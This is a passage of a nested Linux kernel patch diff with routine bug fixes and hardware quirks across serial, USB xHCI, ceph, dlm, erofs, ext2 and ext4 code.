++	uts &= ~UTS_LOOP;
++	imx_uart_writel(sport, uts, imx_uart_uts_reg(sport));
++}
++
+ /* called with port.lock taken and irqs off */
+ static void imx_uart_start_rx(struct uart_port *port)
+ {
+@@ -418,6 +428,7 @@ static void imx_uart_start_rx(struct uart_port *port)
+ 	/* Write UCR2 first as it includes RXEN */
+ 	imx_uart_writel(sport, ucr2, UCR2);
+ 	imx_uart_writel(sport, ucr1, UCR1);
++	imx_uart_disable_loopback_rs485(sport);
+ }
+ 
+ /* called with port.lock taken and irqs off */
+@@ -1404,7 +1415,7 @@ static int imx_uart_startup(struct uart_port *port)
+ 	int retval, i;
+ 	unsigned long flags;
+ 	int dma_is_inited = 0;
+-	u32 ucr1, ucr2, ucr3, ucr4, uts;
++	u32 ucr1, ucr2, ucr3, ucr4;
+ 
+ 	retval = clk_prepare_enable(sport->clk_per);
+ 	if (retval)
+@@ -1509,10 +1520,7 @@ static int imx_uart_startup(struct uart_port *port)
+ 		imx_uart_writel(sport, ucr2, UCR2);
+ 	}
+ 
+-	/* See SER_RS485_ENABLED/UTS_LOOP comment in imx_uart_probe() */
+-	uts = imx_uart_readl(sport, imx_uart_uts_reg(sport));
+-	uts &= ~UTS_LOOP;
+-	imx_uart_writel(sport, uts, imx_uart_uts_reg(sport));
++	imx_uart_disable_loopback_rs485(sport);
+ 
+ 	spin_unlock_irqrestore(&sport->port.lock, flags);
+ 
+diff --git a/drivers/tty/serial/samsung_tty.c b/drivers/tty/serial/samsung_tty.c
+index 77d1363029f55..aa2c51b84116f 100644
+--- a/drivers/tty/serial/samsung_tty.c
++++ b/drivers/tty/serial/samsung_tty.c
+@@ -1467,8 +1467,12 @@ static unsigned int s3c24xx_serial_getclk(struct s3c24xx_uart_port *ourport,
+ 			continue;
+ 
+ 		rate = clk_get_rate(clk);
+-		if (!rate)
++		if (!rate) {
++			dev_err(ourport->port.dev,
++				"Failed to get clock rate for %s.\n", clkname);
++			clk_put(clk);
+ 			continue;
++		}
+ 
+ 		if (ourport->info->has_divslot) {
+ 			unsigned long div = rate / req_baud;
+@@ -1494,10 +1498,18 @@ static unsigned int s3c24xx_serial_getclk(struct s3c24xx_uart_port *ourport,
+ 			calc_deviation = -calc_deviation;
+ 
+ 		if (calc_deviation < deviation) {
++			/*
++			 * If we find a better clk, release the previous one, if
++			 * any.
++			 */
++			if (!IS_ERR(*best_clk))
++				clk_put(*best_clk);
+ 			*best_clk = clk;
+ 			best_quot = quot;
+ 			*clk_num = cnt;
+ 			deviation = calc_deviation;
++		} else {
++			clk_put(clk);
+ 		}
+ 	}
+ 
+diff --git a/drivers/ufs/host/Kconfig b/drivers/ufs/host/Kconfig
+index 4cc2dbd79ed0e..9b39fd76031be 100644
+--- a/drivers/ufs/host/Kconfig
++++ b/drivers/ufs/host/Kconfig
+@@ -71,6 +71,7 @@ config SCSI_UFS_QCOM
+ config SCSI_UFS_MEDIATEK
+ 	tristate "Mediatek specific hooks to UFS controller platform driver"
+ 	depends on SCSI_UFSHCD_PLATFORM && ARCH_MEDIATEK
++	depends on RESET_CONTROLLER
+ 	select PHY_MTK_UFS
+ 	select RESET_TI_SYSCON
+ 	help
+diff --git a/drivers/usb/host/xhci-mem.c b/drivers/usb/host/xhci-mem.c
+index 81ca2bc1f0bef..019dcbe55dbdc 100644
+--- a/drivers/usb/host/xhci-mem.c
++++ b/drivers/usb/host/xhci-mem.c
+@@ -2116,7 +2116,7 @@ static void xhci_add_in_port(struct xhci_hcd *xhci, unsigned int num_ports,
+ {
+ 	u32 temp, port_offset, port_count;
+ 	int i;
+-	u8 major_revision, minor_revision;
++	u8 major_revision, minor_revision, tmp_minor_revision;
+ 	struct xhci_hub *rhub;
+ 	struct device *dev = xhci_to_hcd(xhci)->self.sysdev;
+ 	struct xhci_port_cap *port_cap;
+@@ -2136,6 +2136,15 @@ static void xhci_add_in_port(struct xhci_hcd *xhci, unsigned int num_ports,
+ 		 */
+ 		if (minor_revision > 0x00 && minor_revision < 0x10)
+ 			minor_revision <<= 4;
++		/*
++		 * Some zhaoxin's xHCI controller that follow usb3.1 spec
++		 * but only support Gen1.
++		 */
++		if (xhci->quirks & XHCI_ZHAOXIN_HOST) {
++			tmp_minor_revision = minor_revision;
++			minor_revision = 0;
++		}
++
+ 	} else if (major_revision <= 0x02) {
+ 		rhub = &xhci->usb2_rhub;
+ 	} else {
+@@ -2145,10 +2154,6 @@ static void xhci_add_in_port(struct xhci_hcd *xhci, unsigned int num_ports,
+ 		/* Ignoring port protocol we can't understand. FIXME */
+ 		return;
+ 	}
+-	rhub->maj_rev = XHCI_EXT_PORT_MAJOR(temp);
+-
+-	if (rhub->min_rev < minor_revision)
+-		rhub->min_rev = minor_revision;
+ 
+ 	/* Port offset and count in the third dword, see section 7.2 */
+ 	temp = readl(addr + 2);
+@@ -2167,8 +2172,6 @@ static void xhci_add_in_port(struct xhci_hcd *xhci, unsigned int num_ports,
+ 	if (xhci->num_port_caps > max_caps)
+ 		return;
+ 
+-	port_cap->maj_rev = major_revision;
+-	port_cap->min_rev = minor_revision;
+ 	port_cap->psi_count = XHCI_EXT_PORT_PSIC(temp);
+ 
+ 	if (port_cap->psi_count) {
+@@ -2189,6 +2192,11 @@ static void xhci_add_in_port(struct xhci_hcd *xhci, unsigned int num_ports,
+ 				  XHCI_EXT_PORT_PSIV(port_cap->psi[i - 1])))
+ 				port_cap->psi_uid_count++;
+ 
++			if (xhci->quirks & XHCI_ZHAOXIN_HOST &&
++			    major_revision == 0x03 &&
++			    XHCI_EXT_PORT_PSIV(port_cap->psi[i]) >= 5)
++				minor_revision = tmp_minor_revision;
++
+ 			xhci_dbg(xhci, "PSIV:%d PSIE:%d PLT:%d PFD:%d LP:%d PSIM:%d\n",
+ 				  XHCI_EXT_PORT_PSIV(port_cap->psi[i]),
+ 				  XHCI_EXT_PORT_PSIE(port_cap->psi[i]),
+@@ -2198,6 +2206,15 @@ static void xhci_add_in_port(struct xhci_hcd *xhci, unsigned int num_ports,
+ 				  XHCI_EXT_PORT_PSIM(port_cap->psi[i]));
+ 		}
+ 	}
++
++	rhub->maj_rev = major_revision;
++
++	if (rhub->min_rev < minor_revision)
++		rhub->min_rev = minor_revision;
++
++	port_cap->maj_rev = major_revision;
++	port_cap->min_rev = minor_revision;
++
+ 	/* cache usb2 port capabilities */
+ 	if (major_revision < 0x03 && xhci->num_ext_caps < max_caps)
+ 		xhci->ext_caps[xhci->num_ext_caps++] = temp;
+@@ -2439,8 +2456,12 @@ int xhci_mem_init(struct xhci_hcd *xhci, gfp_t flags)
+ 	 * and our use of dma addresses in the trb_address_map radix tree needs
+ 	 * TRB_SEGMENT_SIZE alignment, so we pick the greater alignment need.
+ 	 */
+-	xhci->segment_pool = dma_pool_create("xHCI ring segments", dev,
+-			TRB_SEGMENT_SIZE, TRB_SEGMENT_SIZE, xhci->page_size);
++	if (xhci->quirks & XHCI_ZHAOXIN_TRB_FETCH)
++		xhci->segment_pool = dma_pool_create("xHCI ring segments", dev,
++				TRB_SEGMENT_SIZE * 2, TRB_SEGMENT_SIZE * 2, xhci->page_size * 2);
++	else
++		xhci->segment_pool = dma_pool_create("xHCI ring segments", dev,
++				TRB_SEGMENT_SIZE, TRB_SEGMENT_SIZE, xhci->page_size);
+ 
+ 	/* See Table 46 and Note on Figure 55 */
+ 	xhci->device_pool = dma_pool_create("xHCI input/output contexts", dev,
+diff --git a/drivers/usb/host/xhci-pci.c b/drivers/usb/host/xhci-pci.c
+index 6e4dac71c409e..5e72d02042ced 100644
+--- a/drivers/usb/host/xhci-pci.c
++++ b/drivers/usb/host/xhci-pci.c
+@@ -335,6 +335,18 @@ static void xhci_pci_quirks(struct device *dev, struct xhci_hcd *xhci)
+ 	     pdev->device == PCI_DEVICE_ID_AMD_PROMONTORYA_4))
+ 		xhci->quirks |= XHCI_NO_SOFT_RETRY;
+ 
++	if (pdev->vendor == PCI_VENDOR_ID_ZHAOXIN) {
++		xhci->quirks |= XHCI_ZHAOXIN_HOST;
++
++		if (pdev->device == 0x9202) {
++			xhci->quirks |= XHCI_RESET_ON_RESUME;
++			xhci->quirks |= XHCI_ZHAOXIN_TRB_FETCH;
++		}
++
++		if (pdev->device == 0x9203)
++			xhci->quirks |= XHCI_ZHAOXIN_TRB_FETCH;
++	}
++
+ 	/* xHC spec requires PCI devices to support D3hot and D3cold */
+ 	if (xhci->hci_version >= 0x120)
+ 		xhci->quirks |= XHCI_DEFAULT_PM_RUNTIME_ALLOW;
+diff --git a/drivers/usb/host/xhci.h b/drivers/usb/host/xhci.h
+index 6348cacdc65ef..1354310cb37b1 100644
+--- a/drivers/usb/host/xhci.h
++++ b/drivers/usb/host/xhci.h
+@@ -1899,6 +1899,8 @@ struct xhci_hcd {
+ #define XHCI_EP_CTX_BROKEN_DCS	BIT_ULL(42)
+ #define XHCI_SUSPEND_RESUME_CLKS	BIT_ULL(43)
+ #define XHCI_RESET_TO_DEFAULT	BIT_ULL(44)
++#define XHCI_ZHAOXIN_TRB_FETCH	BIT_ULL(45)
++#define XHCI_ZHAOXIN_HOST	BIT_ULL(46)
+ 
+ 	unsigned int		num_active_eps;
+ 	unsigned int		limit_active_eps;
+diff --git a/fs/ceph/addr.c b/fs/ceph/addr.c
+index 478c03bfba663..dd2ce7fabbaee 100644
+--- a/fs/ceph/addr.c
++++ b/fs/ceph/addr.c
+@@ -187,16 +187,42 @@ static void ceph_netfs_expand_readahead(struct netfs_io_request *rreq)
+ 	struct inode *inode = rreq->inode;
+ 	struct ceph_inode_info *ci = ceph_inode(inode);
+ 	struct ceph_file_layout *lo = &ci->i_layout;
++	unsigned long max_pages = inode->i_sb->s_bdi->ra_pages;
++	loff_t end = rreq->start + rreq->len, new_end;
++	struct ceph_netfs_request_data *priv = rreq->netfs_priv;
++	unsigned long max_len;
+ 	u32 blockoff;
+-	u64 blockno;
+ 
+-	/* Expand the start downward */
+-	blockno = div_u64_rem(rreq->start, lo->stripe_unit, &blockoff);
+-	rreq->start = blockno * lo->stripe_unit;
+-	rreq->len += blockoff;
++	if (priv) {
++		/* Readahead is disabled by posix_fadvise POSIX_FADV_RANDOM */
++		if (priv->file_ra_disabled)
++			max_pages = 0;
++		else
++			max_pages = priv->file_ra_pages;
++
++	}
+ 
+-	/* Now, round up the length to the next block */
+-	rreq->len = roundup(rreq->len, lo->stripe_unit);
++	/* Readahead is disabled */
++	if (!max_pages)
++		return;
++
++	max_len = max_pages << PAGE_SHIFT;
++
++	/*
++	 * Try to expand the length forward by rounding up it to the next
++	 * block, but do not exceed the file size, unless the original
++	 * request already exceeds it.
++	 */
++	new_end = min(round_up(end, lo->stripe_unit), rreq->i_size);
++	if (new_end > end && new_end <= rreq->start + max_len)
++		rreq->len = new_end - rreq->start;
++
++	/* Try to expand the start downward */
++	div_u64_rem(rreq->start, lo->stripe_unit, &blockoff);
++	if (rreq->len + blockoff <= max_len) {
++		rreq->start -= blockoff;
++		rreq->len += blockoff;
++	}
+ }
+ 
+ static bool ceph_netfs_clamp_length(struct netfs_io_subrequest *subreq)
+@@ -362,18 +388,28 @@ static int ceph_init_request(struct netfs_io_request *rreq, struct file *file)
+ {
+ 	struct inode *inode = rreq->inode;
+ 	int got = 0, want = CEPH_CAP_FILE_CACHE;
++	struct ceph_netfs_request_data *priv;
+ 	int ret = 0;
+ 
+ 	if (rreq->origin != NETFS_READAHEAD)
+ 		return 0;
+ 
++	priv = kzalloc(sizeof(*priv), GFP_NOFS);
++	if (!priv)
++		return -ENOMEM;
++
+ 	if (file) {
+ 		struct ceph_rw_context *rw_ctx;
+ 		struct ceph_file_info *fi = file->private_data;
+ 
++		priv->file_ra_pages = file->f_ra.ra_pages;
++		priv->file_ra_disabled = file->f_mode & FMODE_RANDOM;
++
+ 		rw_ctx = ceph_find_rw_context(fi);
+-		if (rw_ctx)
++		if (rw_ctx) {
++			rreq->netfs_priv = priv;
+ 			return 0;
++		}
+ 	}
+ 
+ 	/*
+@@ -383,27 +419,40 @@ static int ceph_init_request(struct netfs_io_request *rreq, struct file *file)
+ 	ret = ceph_try_get_caps(inode, CEPH_CAP_FILE_RD, want, true, &got);
+ 	if (ret < 0) {
+ 		dout("start_read %p, error getting cap\n", inode);
+-		return ret;
++		goto out;
+ 	}
+ 
+ 	if (!(got & want)) {
+ 		dout("start_read %p, no cache cap\n", inode);
+-		return -EACCES;
++		ret = -EACCES;
++		goto out;
++	}
++	if (ret == 0) {
++		ret = -EACCES;
++		goto out;
+ 	}
+-	if (ret == 0)
+-		return -EACCES;
+ 
+-	rreq->netfs_priv = (void *)(uintptr_t)got;
+-	return 0;
++	priv->caps = got;
++	rreq->netfs_priv = priv;
++
++out:
++	if (ret < 0)
++		kfree(priv);
++
++	return ret;
+ }
+ 
+ static void ceph_netfs_free_request(struct netfs_io_request *rreq)
+ {
+-	struct ceph_inode_info *ci = ceph_inode(rreq->inode);
+-	int got = (uintptr_t)rreq->netfs_priv;
++	struct ceph_netfs_request_data *priv = rreq->netfs_priv;
++
++	if (!priv)
++		return;
+ 
+-	if (got)
+-		ceph_put_cap_refs(ci, got);
++	if (priv->caps)
++		ceph_put_cap_refs(ceph_inode(rreq->inode), priv->caps);
++	kfree(priv);
++	rreq->netfs_priv = NULL;
+ }
+ 
+ const struct netfs_request_ops ceph_netfs_ops = {
+diff --git a/fs/ceph/caps.c b/fs/ceph/caps.c
+index cdb26aadae125..4a9ad5ff726d4 100644
+--- a/fs/ceph/caps.c
++++ b/fs/ceph/caps.c
+@@ -3561,6 +3561,15 @@ static void handle_cap_grant(struct inode *inode,
+ 	}
+ 	BUG_ON(cap->issued & ~cap->implemented);
+ 
++	/* don't let check_caps skip sending a response to MDS for revoke msgs */
++	if (le32_to_cpu(grant->op) == CEPH_CAP_OP_REVOKE) {
++		cap->mds_wanted = 0;
++		if (cap == ci->i_auth_cap)
++			check_caps = 1; /* check auth cap only */
++		else
++			check_caps = 2; /* check all caps */
++	}
++
+ 	if (extra_info->inline_version > 0 &&
+ 	    extra_info->inline_version >= ci->i_inline_version) {
+ 		ci->i_inline_version = extra_info->inline_version;
+diff --git a/fs/ceph/super.h b/fs/ceph/super.h
+index 478b741b11075..562f42f4a77d7 100644
+--- a/fs/ceph/super.h
++++ b/fs/ceph/super.h
+@@ -451,6 +451,19 @@ struct ceph_inode_info {
+ 	unsigned long  i_work_mask;
+ };
+ 
++struct ceph_netfs_request_data {
++	int caps;
++
++	/*
++	 * Maximum size of a file readahead request.
++	 * The fadvise could update the bdi's default ra_pages.
++	 */
++	unsigned int file_ra_pages;
++
++	/* Set it if fadvise disables file readahead entirely */
++	bool file_ra_disabled;
++};
++
+ static inline struct ceph_inode_info *
+ ceph_inode(const struct inode *inode)
+ {
+diff --git a/fs/dlm/lockspace.c b/fs/dlm/lockspace.c
+index 7b29ea7bfb416..23cf9b8f31b74 100644
+--- a/fs/dlm/lockspace.c
++++ b/fs/dlm/lockspace.c
+@@ -958,15 +958,3 @@ void dlm_stop_lockspaces(void)
+ 		log_print("dlm user daemon left %d lockspaces", count);
+ }
+ 
+-void dlm_stop_lockspaces_check(void)
+-{
+-	struct dlm_ls *ls;
+-
+-	spin_lock(&lslist_lock);
+-	list_for_each_entry(ls, &lslist, ls_list) {
+-		if (WARN_ON(!rwsem_is_locked(&ls->ls_in_recovery) ||
+-			    !dlm_locking_stopped(ls)))
+-			break;
+-	}
+-	spin_unlock(&lslist_lock);
+-}
+diff --git a/fs/dlm/lockspace.h b/fs/dlm/lockspace.h
+index 03f4a4a3a871c..47ebd44119264 100644
+--- a/fs/dlm/lockspace.h
++++ b/fs/dlm/lockspace.h
+@@ -27,7 +27,6 @@ struct dlm_ls *dlm_find_lockspace_local(void *id);
+ struct dlm_ls *dlm_find_lockspace_device(int minor);
+ void dlm_put_lockspace(struct dlm_ls *ls);
+ void dlm_stop_lockspaces(void);
+-void dlm_stop_lockspaces_check(void);
+ int dlm_new_user_lockspace(const char *name, const char *cluster,
+ 			   uint32_t flags, int lvblen,
+ 			   const struct dlm_lockspace_ops *ops,
+diff --git a/fs/dlm/midcomms.c b/fs/dlm/midcomms.c
+index b2a25a33a1488..71e426da48c3d 100644
+--- a/fs/dlm/midcomms.c
++++ b/fs/dlm/midcomms.c
+@@ -136,7 +136,6 @@
+ #include <net/tcp.h>
+ 
+ #include "dlm_internal.h"
+-#include "lockspace.h"
+ #include "lowcomms.h"
+ #include "config.h"
+ #include "memory.h"
+@@ -1458,8 +1457,6 @@ int dlm_midcomms_close(int nodeid)
+ 	if (nodeid == dlm_our_nodeid())
+ 		return 0;
+ 
+-	dlm_stop_lockspaces_check();
+-
+ 	idx = srcu_read_lock(&nodes_srcu);
+ 	/* Abort pending close/remove operation */
+ 	node = nodeid2node(nodeid, 0);
+diff --git a/fs/dlm/plock.c b/fs/dlm/plock.c
+index 737f185aad8dd..739e7d55c9e3d 100644
+--- a/fs/dlm/plock.c
++++ b/fs/dlm/plock.c
+@@ -29,8 +29,6 @@ struct plock_async_data {
+ struct plock_op {
+ 	struct list_head list;
+ 	int done;
+-	/* if lock op got interrupted while waiting dlm_controld reply */
+-	bool sigint;
+ 	struct dlm_plock_info info;
+ 	/* if set indicates async handling */
+ 	struct plock_async_data *data;
+@@ -156,23 +154,29 @@ int dlm_posix_lock(dlm_lockspace_t *lockspace, u64 number, struct file *file,
+ 
+ 	send_op(op);
+ 
+-	rv = wait_event_interruptible(recv_wq, (op->done != 0));
+-	if (rv == -ERESTARTSYS) {
+-		spin_lock(&ops_lock);
+-		/* recheck under ops_lock if we got a done != 0,
+-		 * if so this interrupt case should be ignored
+-		 */
+-		if (op->done != 0) {
++	if (op->info.wait) {
++		rv = wait_event_killable(recv_wq, (op->done != 0));
++		if (rv == -ERESTARTSYS) {
++			spin_lock(&ops_lock);
++			/* recheck under ops_lock if we got a done != 0,
++			 * if so this interrupt case should be ignored
++			 */
++			if (op->done != 0) {
++				spin_unlock(&ops_lock);
++				goto do_lock_wait;
++			}
++			list_del(&op->list);
+ 			spin_unlock(&ops_lock);
+-			goto do_lock_wait;
+-		}
+ 
+-		op->sigint = true;
+-		spin_unlock(&ops_lock);
+-		log_debug(ls, "%s: wait interrupted %x %llx pid %d",
+-			  __func__, ls->ls_global_id,
+-			  (unsigned long long)number, op->info.pid);
+-		goto out;
++			log_debug(ls, "%s: wait interrupted %x %llx pid %d",
++				  __func__, ls->ls_global_id,
++				  (unsigned long long)number, op->info.pid);
++			do_unlock_close(&op->info);
++			dlm_release_plock_op(op);
++			goto out;
++		}
++	} else {
++		wait_event(recv_wq, (op->done != 0));
+ 	}
+ 
+ do_lock_wait:
+@@ -359,7 +363,9 @@ int dlm_posix_get(dlm_lockspace_t *lockspace, u64 number, struct file *file,
+ 		locks_init_lock(fl);
+ 		fl->fl_type = (op->info.ex) ? F_WRLCK : F_RDLCK;
+ 		fl->fl_flags = FL_POSIX;
+-		fl->fl_pid = -op->info.pid;
++		fl->fl_pid = op->info.pid;
++		if (op->info.nodeid != dlm_our_nodeid())
++			fl->fl_pid = -fl->fl_pid;
+ 		fl->fl_start = op->info.start;
+ 		fl->fl_end = op->info.end;
+ 		rv = 0;
+@@ -388,7 +394,7 @@ static ssize_t dev_read(struct file *file, char __user *u, size_t count,
+ 		if (op->info.flags & DLM_PLOCK_FL_CLOSE)
+ 			list_del(&op->list);
+ 		else
+-			list_move(&op->list, &recv_list);
++			list_move_tail(&op->list, &recv_list);
+ 		memcpy(&info, &op->info, sizeof(info));
+ 	}
+ 	spin_unlock(&ops_lock);
+@@ -426,34 +432,53 @@ static ssize_t dev_write(struct file *file, const char __user *u, size_t count,
+ 	if (check_version(&info))
+ 		return -EINVAL;
+ 
++	/*
++	 * The results for waiting ops (SETLKW) can be returned in any
++	 * order, so match all fields to find the op.  The results for
++	 * non-waiting ops are returned in the order that they were sent
++	 * to userspace, so match the result with the first non-waiting op.
++	 */
+ 	spin_lock(&ops_lock);
+-	list_for_each_entry(iter, &recv_list, list) {
+-		if (iter->info.fsid == info.fsid &&
+-		    iter->info.number == info.number &&
+-		    iter->info.owner == info.owner) {
+-			if (iter->sigint) {
+-				list_del(&iter->list);
+-				spin_unlock(&ops_lock);
+-
+-				pr_debug("%s: sigint cleanup %x %llx pid %d",
+-					  __func__, iter->info.fsid,
+-					  (unsigned long long)iter->info.number,
+-					  iter->info.pid);
+-				do_unlock_close(&iter->info);
+-				memcpy(&iter->info, &info, sizeof(info));
+-				dlm_release_plock_op(iter);
+-				return count;
++	if (info.wait) {
++		list_for_each_entry(iter, &recv_list, list) {
++			if (iter->info.fsid == info.fsid &&
++			    iter->info.number == info.number &&
++			    iter->info.owner == info.owner &&
++			    iter->info.pid == info.pid &&
++			    iter->info.start == info.start &&
++			    iter->info.end == info.end &&
++			    iter->info.ex == info.ex &&
++			    iter->info.wait) {
++				op = iter;
++				break;
++			}
++		}
++	} else {
++		list_for_each_entry(iter, &recv_list, list) {
++			if (!iter->info.wait) {
++				op = iter;
++				break;
+ 			}
+-			list_del_init(&iter->list);
+-			memcpy(&iter->info, &info, sizeof(info));
+-			if (iter->data)
+-				do_callback = 1;
+-			else
+-				iter->done = 1;
+-			op = iter;
+-			break;
+ 		}
+ 	}
++
++	if (op) {
++		/* Sanity check that op and info match. */
++		if (info.wait)
++			WARN_ON(op->info.optype != DLM_PLOCK_OP_LOCK);
++		else
++			WARN_ON(op->info.fsid != info.fsid ||
++				op->info.number != info.number ||
++				op->info.owner != info.owner ||
++				op->info.optype != info.optype);
++
++		list_del_init(&op->list);
++		memcpy(&op->info, &info, sizeof(info));
++		if (op->data)
++			do_callback = 1;
++		else
++			op->done = 1;
++	}
+ 	spin_unlock(&ops_lock);
+ 
+ 	if (op) {
+@@ -462,8 +487,8 @@ static ssize_t dev_write(struct file *file, const char __user *u, size_t count,
+ 		else
+ 			wake_up(&recv_wq);
+ 	} else
+-		log_print("%s: no op %x %llx", __func__,
+-			  info.fsid, (unsigned long long)info.number);
++		pr_debug("%s: no op %x %llx", __func__,
++			 info.fsid, (unsigned long long)info.number);
+ 	return count;
+ }
+ 
+diff --git a/fs/erofs/inode.c b/fs/erofs/inode.c
+index 5aadc73d57652..e090bcd46db14 100644
+--- a/fs/erofs/inode.c
++++ b/fs/erofs/inode.c
+@@ -186,7 +186,8 @@ static void *erofs_read_inode(struct erofs_buf *buf,
+ 
+ 	inode->i_flags &= ~S_DAX;
+ 	if (test_opt(&sbi->opt, DAX_ALWAYS) && S_ISREG(inode->i_mode) &&
+-	    vi->datalayout == EROFS_INODE_FLAT_PLAIN)
++	    (vi->datalayout == EROFS_INODE_FLAT_PLAIN ||
++	     vi->datalayout == EROFS_INODE_CHUNK_BASED))
+ 		inode->i_flags |= S_DAX;
+ 	if (!nblks)
+ 		/* measure inode.i_blocks as generic filesystems */
+diff --git a/fs/erofs/zdata.c b/fs/erofs/zdata.c
+index 92b2e4ddb7ce9..533e612b6a486 100644
+--- a/fs/erofs/zdata.c
++++ b/fs/erofs/zdata.c
+@@ -866,7 +866,7 @@ hitted:
+ 	 */
+ 	tight &= (fe->mode > Z_EROFS_PCLUSTER_FOLLOWED_NOINPLACE);
+ 
+-	cur = end - min_t(unsigned int, offset + end - map->m_la, end);
++	cur = end - min_t(erofs_off_t, offset + end - map->m_la, end);
+ 	if (!(map->m_flags & EROFS_MAP_MAPPED)) {
+ 		zero_user_segment(page, cur, end);
+ 		goto next_part;
+@@ -1660,7 +1660,7 @@ static void z_erofs_pcluster_readmore(struct z_erofs_decompress_frontend *f,
+ 	}
+ 
+ 	cur = map->m_la + map->m_llen - 1;
+-	while (cur >= end) {
++	while ((cur >= end) && (cur < i_size_read(inode))) {
+ 		pgoff_t index = cur >> PAGE_SHIFT;
+ 		struct page *page;
+ 
+diff --git a/fs/ext2/inode.c b/fs/ext2/inode.c
+index 918ab2f9e4c05..5a32fcd55183b 100644
+--- a/fs/ext2/inode.c
++++ b/fs/ext2/inode.c
+@@ -1265,9 +1265,8 @@ static int ext2_setsize(struct inode *inode, loff_t newsize)
+ 	inode_dio_wait(inode);
+ 
+ 	if (IS_DAX(inode))
+-		error = dax_zero_range(inode, newsize,
+-				       PAGE_ALIGN(newsize) - newsize, NULL,
+-				       &ext2_iomap_ops);
++		error = dax_truncate_page(inode, newsize, NULL,
++					  &ext2_iomap_ops);
+ 	else
+ 		error = block_truncate_page(inode->i_mapping,
+ 				newsize, ext2_get_block);
+diff --git a/fs/ext4/indirect.c b/fs/ext4/indirect.c
+index c68bebe7ff4b6..a9f3716119d37 100644
+--- a/fs/ext4/indirect.c
++++ b/fs/ext4/indirect.c
+@@ -651,6 +651,14 @@ int ext4_ind_map_blocks(handle_t *handle, struct inode *inode,
+ 
+ 	ext4_update_inode_fsync_trans(handle, inode, 1);
+ 	count = ar.len;
++
++	/*
++	 * Update reserved blocks/metadata blocks after successful block
++	 * allocation which had been deferred till now.
++	 */
++	if (flags & EXT4_GET_BLOCKS_DELALLOC_RESERVE)
++		ext4_da_update_reserve_space(inode, count, 1);
++
+ got_it:
+ 	map->m_flags |= EXT4_MAP_MAPPED;
+ 	map->m_pblk = le32_to_cpu(chain[depth-1].key);
+diff --git a/fs/ext4/inode.c b/fs/ext4/inode.c
+index 80d5a859ab148..5aa3003cfc688 100644
+--- a/fs/ext4/inode.c
++++ b/fs/ext4/inode.c
+@@ -660,16 +660,6 @@ found:
+ 			 */
+ 			ext4_clear_inode_state(inode, EXT4_STATE_EXT_MIGRATE);
+ 		}
+-
+-		/*
+-		 * Update reserved blocks/metadata blocks after successful
+-		 * block allocation which had been deferred till now. We don't
+-		 * support fallocate for non extent files. So we can update
+-		 * reserve space here.
+-		 */
+-		if ((retval > 0) &&
+-			(flags & EXT4_GET_BLOCKS_DELALLOC_RESERVE))
+-			ext4_da_update_reserve_space(inode, retval, 1);
+ 	}
+ 
+ 	if (retval > 0) {
+diff --git a/fs/ext4/ioctl.c b/fs/ext4/ioctl.c
+index 8c2b1ff5e6959..3784f70416492 100644
+--- a/fs/ext4/ioctl.c
++++ b/fs/ext4/ioctl.c
+@@ -800,6 +800,7 @@ static int ext4_shutdown(struct super_block *sb, unsigned long arg)
+ {
+ 	struct ext4_sb_info *sbi = EXT4_SB(sb);
+ 	__u32 flags;
++	int ret;
+ 
+ 	if (!capable(CAP_SYS_ADMIN))
+ 		return -EPERM;
+@@ -818,7 +819,9 @@ static int ext4_shutdown(struct super_block *sb, unsigned long arg)
+ 
+ 	switch (flags) {
+ 	case EXT4_GOING_FLAGS_DEFAULT:
+-		freeze_bdev(sb->s_bdev);
++		ret = freeze_bdev(sb->s_bdev);
++		if (ret)
++			return ret;
+ 		set_bit(EXT4_FLAGS_SHUTDOWN, &sbi->s_ext4_flags);
+ 		thaw_bdev(sb->s_bdev);
+ 		break;
+diff --git a/fs/ext4/mballoc.c b/fs/ext4/mballoc.c
+index 32d88757a780e..88ed64ebae3e7 100644
+--- a/fs/ext4/mballoc.c
++++ b/fs/ext4/mballoc.c
+@@ -6073,8 +6073,8 @@ do_more:
+ 		 * them with group lock_held
+ 		 */
+ 		if (test_opt(sb, DISCARD)) {
+-			err = ext4_issue_discard(sb, block_group, bit, count,
+-						 NULL);
++			err = ext4_issue_discard(sb, block_group, bit,
++						 count_clusters, NULL);
+ 			if (err && err != -EOPNOTSUPP)
+ 				ext4_msg(sb, KERN_WARNING, "discard request in"
+ 					 " group:%u block:%d count:%lu failed"
+@@ -6158,12 +6158,6 @@ void ext4_free_blocks(handle_t *handle, struct inode *inode,
+ 
+ 	sbi = EXT4_SB(sb);
+ 
+-	if (sbi->s_mount_state & EXT4_FC_REPLAY) {
+-		ext4_free_blocks_simple(inode, block, count);
+-		return;
+-	}
+-
+-	might_sleep();
+ 	if (bh) {
+ 		if (block)
+ 			BUG_ON(block != bh->b_blocknr);
+@@ -6171,6 +6165,13 @@ void ext4_free_blocks(handle_t *handle, struct inode *inode,
+ 			block = bh->b_blocknr;
+ 	}
+ 
++	if (sbi->s_mount_state & EXT4_FC_REPLAY) {
++		ext4_free_blocks_simple(inode, block, EXT4_NUM_B2C(sbi, count));
++		return;
++	}
++
++	might_sleep();
++
+ 	if (!(flags & EXT4_FREE_BLOCKS_VALIDATED) &&
+ 	    !ext4_inode_block_valid(inode, block, count)) {
+ 		ext4_error(sb, "Freeing blocks not in datazone - "
+diff --git a/fs/ext4/super.c b/fs/ext4/super.c
+index 760249d9152d1..601e097e17207 100644
+--- a/fs/ext4/super.c
++++ b/fs/ext4/super.c
+@@ -1129,6 +1129,12 @@ static void ext4_blkdev_remove(struct ext4_sb_info *sbi)
+ 	struct block_device *bdev;
+ 	bdev = sbi->s_journal_bdev;
+ 	if (bdev) {
++		/*
++		 * Invalidate the journal device's buffers.  We don't want them
++		 * floating about in memory - the physical journal device may
++		 * hotswapped, and it breaks the `ro-after' testing code.
++		 */
++		invalidate_bdev(bdev);
+ 		ext4_blkdev_put(bdev);
+ 		sbi->s_journal_bdev = NULL;
+ 	}
+@@ -1274,13 +1280,7 @@ static void ext4_put_super(struct super_block *sb)
+ 	sync_blockdev(sb->s_bdev);
+ 	invalidate_bdev(sb->s_bdev);
+ 	if (sbi->s_journal_bdev && sbi->s_journal_bdev != sb->s_bdev) {
+-		/*
+-		 * Invalidate the journal device's buffers.  We don't want them
+-		 * floating about in memory - the physical journal device may
+-		 * hotswapped, and it breaks the `ro-after' testing code.
+-		 */
+ 		sync_blockdev(sbi->s_journal_bdev);
+-		invalidate_bdev(sbi->s_journal_bdev);
+ 		ext4_blkdev_remove(sbi);
+ 	}
+ 
+@@ -5544,7 +5544,7 @@ static int __ext4_fill_super(struct fs_context *fc, struct super_block *sb)
+ 		ext4_msg(sb, KERN_INFO, "recovery complete");
